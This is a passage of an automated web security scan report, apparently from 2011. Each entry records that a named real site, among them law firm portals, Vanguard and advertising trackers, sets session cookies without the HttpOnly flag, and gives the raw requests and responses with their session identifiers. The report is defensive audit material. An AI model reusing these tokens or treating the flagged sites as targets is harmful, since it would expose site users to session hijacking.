User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 403
Content-Type: text/html
Expires: Thu, 12 May 2011 12:25:30 GMT
Set-Cookie: ASPSESSIONIDSQCDBTRB=AEGHIDNBPNJAPLEFPMPOEJNA; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <title>AMS Legal Collaborator</title>
</head>
<frameset rows="100%,0" border="0">
   <frame name="MainPnl" src="Logi
...[SNIP]...

14.5. https://ams-legal.net/tuckerellis/default.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://ams-legal.net
Path:   /tuckerellis/default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tuckerellis/default.asp HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 403
Content-Type: text/html
Expires: Thu, 12 May 2011 12:25:35 GMT
Set-Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <title>AMS Legal Collaborator</title>
</head>
<frameset rows="100%,0" border="0">
   <frame name="MainPnl" src="Logi
...[SNIP]...

14.6. http://axley.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://axley.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: axley.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Axley+Brynelson&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:19:01 GMT
Set-Cookie: JSESSIONID=9F000B72936C899EC0768471D81E1100; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 22030


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="generator" content="IMS Neptune CMS v1.0" />
<meta http-equiv="content-type" content="text
...[SNIP]...

14.7. http://cgiwsc.enhancedsitebuilder.com/cgi-bin/counter.PicCount

Summary

Severity:   Low
Confidence:   Firm
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /cgi-bin/counter.PicCount

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/counter.PicCount?userid=AENDU0IN29GG&bgc=0A2447&fgc=FFFFFF&fn=Horizon&fs=20&fs=14&digits=7&gif=yes&type=trans HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:40 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Set-Cookie: JSESSIONID=2A91EB108D080C11C3E7AA2D05A34652.231150A3; Path=/cgi-bin
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
P3P: CP="NOI COR CURa INT"
Content-Length: 44

GIF89a.............!.......,...........D...;

14.8. http://cgiwsc.enhancedsitebuilder.com/extras/public/formular.cls/show

Summary

Severity:   Low
Confidence:   Firm
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /extras/public/formular.cls/show

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /extras/public/formular.cls/show?cc=0.7596080219373107&accountId=AENDU0IN29GG&instanceId=25529&LC=en_US HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:50 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Set-Cookie: rauth.session=10f685eb770f8444e1de8e677b5be537; Path=/
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 6157


       keepMeAlive = new Keepalive("http://cgiwsc.enhancedsitebuilder.com/extras/public/keepalive.gif");
   
document.write("<form id=\"formular\" name=\"formular\" method=\"post\" onSubmit=\"return formula
...[SNIP]...

14.9. http://convctr.overture.com/images/cc/cc.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://convctr.overture.com
Path:   /images/cc/cc.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/cc/cc.gif?ver=1.0&aID=5819599720&mkt=0&ref= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: convctr.overture.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:00 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a mod_perl/1.29
Set-Cookie: SessionData=02u3hs9yoaT4tKLixNTUk1sQEAI0NXN1djJ0dTY7UL1ODi4vzMoDyGQWYGls5OjsZObgYWRq5GAE5xk2YO; domain=.overture.com; path=/; expires=Thu, 12-May-2011 11:20:00 GMT
Set-Cookie: UserData=02u3hs9yoaT4tKLixNTUk1sQEAI0NXN1djJ0dTY7UL4tCQVIZRZgaWzk6Oxk5uBhZGrkYATspeIQ0%3D; domain=.overture.com; path=/; expires=Sun, 09-May-2021 11:15:00 GMT
P3P: CP=" NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR STP IND UNI COM NAV INT STA "
Pragma: no-cache
Connection: close
Content-Type: image/gif
Content-Length: 34

GIF89a.............,...........L.;

14.10. http://cpadominator.com/campaigns/index.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://cpadominator.com
Path:   /campaigns/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaigns/index.php?g=cxnsw&kw=ym HTTP/1.1
Host: cpadominator.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:02:05 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c13141a89a788eb38ce9b892c430d1bb; path=/
Set-Cookie: splatcookie[id]=102; expires=Wed, 31-Aug-2011 14:42:05 GMT
Set-Cookie: splatcookie[group]=154; expires=Wed, 31-Aug-2011 14:42:05 GMT
Location: http://myonlinearcade.com/survey/c/indexns.html
Content-Type: text/html
Content-Length: 0


14.11. http://foxbusiness.disqus.com/thread.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://foxbusiness.disqus.com
Path:   /thread.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /thread.js?url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&title=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer&sort=&per_page&category_id=462875&developer=0&identifier=f98dc357cc6bf210VgnVCM10000086c1a8c0RCRD&remote_auth_s2=e30%3D%20c5d5d037748a67e6b04679c3eadc2d7b0b1486fb%201305198974&1305200288779 HTTP/1.1
Host: foxbusiness.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1305161240.15.15.utmcsr=connectedplanetonline.com|utmccn=(referral)|utmcmd=referral|utmcct=/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/; __utma=113869458.1602204697.1303349184.1305126028.1305161240.15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:07 GMT
Server: Apache/2.2.14 (Ubuntu)
Content-Language: en-us
Vary: Accept-Language,Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: test=1; Path=/
Set-Cookie: sessionid=5439c19bf65868637b6d94bd5708f992; Domain=.disqus.com; expires=Thu, 26-May-2011 11:39:08 GMT; Max-Age=1209600; Path=/
Connection: close
Content-Type: text/javascript; charset=UTF-8
Content-Length: 8829

/*jslint evil:true */
/**
* Dynamic thread loader
*
*
*
*
*
*
*/

//
var DISQUS;
if (!DISQUS || typeof DISQUS == 'function') {
throw "DISQUS object is not initialized";
}
//

// json
...[SNIP]...

14.12. http://generalatlantic.com/en/team/overview

Summary

Severity:   Low
Confidence:   Firm
Host:   http://generalatlantic.com
Path:   /en/team/overview

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/team/overview HTTP/1.1
Host: generalatlantic.com
Proxy-Connection: keep-alive
Referer: http://generalatlantic.com/en/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=34463671.1305198053.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=34463671.349629096.1305198053.1305198053.1305198053.1; __utmc=34463671; __utmb=34463671.1.10.1305198053

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:07:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: _ga_session=BAh7CDoLcmVnaW9uIg1BbWVyaWNhczoLbG9jYWxlIgdlbiIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--8393d076db3871a91209949e85bda4abfffada2d; path=/
Status: 200 OK
X-Runtime: 0.15600
ETag: "723c5e4449f969abdccd57b7659005ff"
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 15384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta
...[SNIP]...

14.13. http://m1463.ic-live.com/572/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://m1463.ic-live.com
Path:   /572/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /572/?105989004&OVMTC=e&OVKEY=private%20equity%20investors&timestamp=20110512110254&creative=1294844&adcid=4583118 HTTP/1.1
Host: m1463.ic-live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C73A01F5BEE38ED2F3A801AA8E6D7816.mch1-rdr-3; Path=/
Set-Cookie: ngx_userid=173.193.214.243:1305198193830; Domain=.ic-live.com; Expires=Sat, 11-May-2013 11:03:13 GMT; Path=/
Set-Cookie: pid2=1305198194n7FRy5HWuZy599; Domain=.ic-live.com; Expires=Fri, 11-May-2012 11:03:13 GMT; Path=/
Set-Cookie: sid1463=1305198194n7FRy5HWuZy599; Domain=.ic-live.com; Path=/
Set-Cookie: cvt572=105989004; Domain=.ic-live.com; Expires=Sat, 11-Jun-2011 11:03:13 GMT; Path=/
Set-Cookie: ngx_105989004=2011-05-12:04:03:13; Domain=.ic-live.com; Expires=Fri, 13-May-2011 11:03:13 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa PSAa OUR BUS IND UNI COM NAV INT"
Location: https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds?FundGroup=EQ&adid=icmsch105989004
Date: Thu, 12 May 2011 11:03:13 GMT
Set-Cookie: Coyote-2-a21011e=a210185:0; path=/
Content-Length: 0


14.14. https://personal.vanguard.com/us/funds/snapshot

Summary

Severity:   Low
Confidence:   Firm
Host:   https://personal.vanguard.com
Path:   /us/funds/snapshot

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1 HTTP/1.1
Host: personal.vanguard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:09:22 GMT
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: TLTSID=4A6B94427C88107C0D0888D5141005F1; Path=/; Domain=.vanguard.com
Set-Cookie: TLTUID=4A6B94427C88107C0D0888D5141005F1; Path=/; Domain=.vanguard.com; Expires=Thu, 12-05-2021 11:09:22 GMT
Content-language: en
Set-cookie: JSESSIONID=0000NlNxb4pkRjQ9SuyVJzXRQ-V:15o5flja9; Path=/; Domain=.vanguard.com; Secure
Set-cookie: SSLB=0; Path=/; Domain=.vanguard.com
Set-Cookie: HNWPRD=D21;path=/;domain=.vanguard.com;
Content-Length: 62217



...[SNIP]...

14.15. http://privatemoneytalk.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://privatemoneytalk.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?utm_source=msn&utm_medium=cpc&utm_term=private%20equity HTTP/1.1
Host: privatemoneytalk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:34 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://privatemoneytalk.com/xmlrpc.php
Set-Cookie: PHPSESSID=35655162a024a2c7b1ebfebb9b6b03b6; path=/
Set-Cookie: sbmg_footerShowAfter=1; expires=Fri, 11-May-2012 11:02:35 GMT; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 22087

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en-US">
<head>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<meta http-equiv="Content-Type" cont
...[SNIP]...

14.16. http://revelations.trovus.co.uk/tracker/542.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://revelations.trovus.co.uk
Path:   /tracker/542.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tracker/542.gif?j=1&w=1920&r=&t=FT.com%20%2F%20In%20depth%20%2F%20Private%20equity&u=http%3A%2F%2Fwww.ft.com%2Findepth%2Fprivateequity&wtf=1305198191 HTTP/1.1
Host: revelations.trovus.co.uk
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 12 May 2011 11:03:41 GMT
Content-Type: image/gif
Connection: keep-alive
Status: 200 OK
P3P: CP="NOI CUR ADMa DEVa TAIa OUR IND UNI COM NAV INT"
Last-Modified: Fri, 13 Aug 2010 21:06:45 GMT
Content-Disposition: inline
Content-Length: 35
Set-Cookie: revelations_visitor_md5=BAgiJTBkNzkyYTZmZDJhZTgzZWU2MDliYzc1Yzk5M2RkZmU1--1a7bf469dc59bc16efca73254c0b6b3e818e6386; path=/; expires=Thu, 12-May-2016 11:03:41 GMT
Set-Cookie: revelations_site_542_visitor_session_uuid=BAgiKTJiOTA4Mjc0LWY3ZWQtNGZmOS1hMWUwLWZkYWZmNWQwYTJlZA%3D%3D--37fe93879173079047058b95fc48f2b0387aa96a; path=/; expires=Thu, 12-May-2011 11:18:41 GMT
Cache-Control: no-cache

GIF89a.............,...........D..;

14.17. https://secure.reportingsystem.com/TPG/index.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.reportingsystem.com
Path:   /TPG/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TPG/index.cfm HTTP/1.1
Host: secure.reportingsystem.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:24:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=2712786;HttpOnly;Secure
Set-Cookie: CFTOKEN=81013834;HttpOnly;Secure
Set-Cookie: JSESSIONID=4830b14a24305d117a65TR;HttpOnly;Secure
Set-Cookie: CFID=2712786;expires=Sat, 04-May-2041 11:24:35 GMT;path=/
Set-Cookie: CFTOKEN=81013834;expires=Sat, 04-May-2041 11:24:35 GMT;path=/
Set-Cookie: JSESSIONID=4830b14a24305d117a65TR;path=/
Expires: {ts '2011-05-12 07:24:35'}
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

   <META HTT
...[SNIP]...

14.18. https://services.sungarddx.com/common/js/AdminFunctions.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://services.sungarddx.com
Path:   /common/js/AdminFunctions.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /common/js/AdminFunctions.asp HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
Referer: https://services.sungarddx.com/Default.aspx?DN=1,Documents&URL=DN=161476,1,Documents
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; ASP.NET_SessionId=y0p1pwqsypoej3ybg3zrlm2v

Response

HTTP/1.1 200 OK
Cache-Control: PUBLIC
Content-Length: 6977
Content-Type: text/html
Expires: Thu, 12 May 2011 23:40:46 GMT
Last-Modified: Thu, 12 May 2011 11:40:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQBBSCRR=EAGLHBFBJGMGAJGCNKJEJDGG; path=/
Date: Thu, 12 May 2011 11:40:46 GMT


//<script language="javascript">
//<!--
///<summary>
///Misc administrative functions
///</summary>
///<scope>both</scope>


///<summary>
/// Used to get into the console and backend stuf
...[SNIP]...

14.19. https://services.sungarddx.com/js/source.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://services.sungarddx.com
Path:   /js/source.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/source.asp HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
Referer: https://services.sungarddx.com/Default.aspx?DN=1,Documents&URL=DN=161476,1,Documents
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; ASP.NET_SessionId=y0p1pwqsypoej3ybg3zrlm2v

Response

HTTP/1.1 200 OK
Cache-Control: PUBLIC
Content-Length: 92885
Content-Type: application/x-javascript
Expires: Thu, 12 May 2011 23:40:44 GMT
Last-Modified: Thu, 12 May 2011 11:40:44 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQBBSCRR=DAGLHBFBNBLDAFJEJOEBHHML; path=/
Date: Thu, 12 May 2011 11:40:44 GMT

//<!--

///<summary>
/// Attempt to find something to focus on while on the PSI form page
///</summary>
function DoPSIFocus()
{
try
{
var oLogin = document.forms["Inputform"].
...[SNIP]...

14.20. http://trc.taboolasyndication.com/bloomberg/trc/2/json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://trc.taboolasyndication.com
Path:   /bloomberg/trc/2/json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bloomberg/trc/2/json?publisher=bloomberg&pv=2&list-size=9&list-id=rbox-t2v&id=237&uim=horizontal-t2v&intent=s&uip=horizontal-t2v&item-id=http%3A%2F%2Fwww.bloomberg.com%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&item-type=text&item-url=http%3A%2F%2Fwww.bloomberg.com%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&page-id=8b30818aaf47422a6a90e7b9a6ea55e93a6ee14a&cv=4-6-15-45512-2660204&uiv=default HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:52 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain; charset=utf-8
Set-Cookie: taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0;Path=/;Expires=Fri, 11-May-12 11:37:52 GMT
Set-Cookie: taboola_session_id=v1_96312820aedf9fdd5216e070e722f405_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1305200272_1305200272;Path=/bloomberg/
Set-Cookie: JSESSIONID=.prod2-f3;Path=/
Set-Cookie: taboola_wv=;Path=/bloomberg/;Expires=Fri, 11-May-12 11:37:52 GMT
Vary: Accept-Encoding
